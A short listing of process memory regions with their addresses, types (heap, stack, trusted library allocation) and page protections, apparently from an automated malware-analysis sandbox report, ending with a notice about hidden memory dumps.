21019000
|
trusted library allocation
|
page read and write
|
||
|
27AF1971000
|
heap
|
page read and write
|
||
|
4CF0000
|
heap
|
page execute and read and write
|
||
|
27AF1BFA000
|
heap
|
page read and write
|
||
|
20CF0000
|
trusted library allocation
|
page read and write
|
||
|
21011000
|
trusted library allocation
|
page read and write
|
||
|
27AD7A95000
|
heap
|
page read and write
|
||
|
248D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
20EF0000
|
trusted library allocation
|
page read and write
|
||
|
27ADB583000
|
trusted library allocation
|
page read and write
|
||
|
22F90000
|
heap
|
page read and write
|
||
|
27AF1B50000
|
heap
|
page read and write
|
||
|
2119B000
|
trusted library allocation
|
page read and write
|
||
|
FA37A0E000
|
stack
|
page read and write
|
||
|
258A9060000
|
heap
|
page read and write
|
||
|
54A6000
|
heap
|
page read and write
|
||
|
27AF1C00000
|
heap
|
page read and write
|
||
|
258A9040000
|
heap
|
page read and write
|
||
|
FA3677E000
|
stack
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
There are 662 hidden memdumps, click here to show them.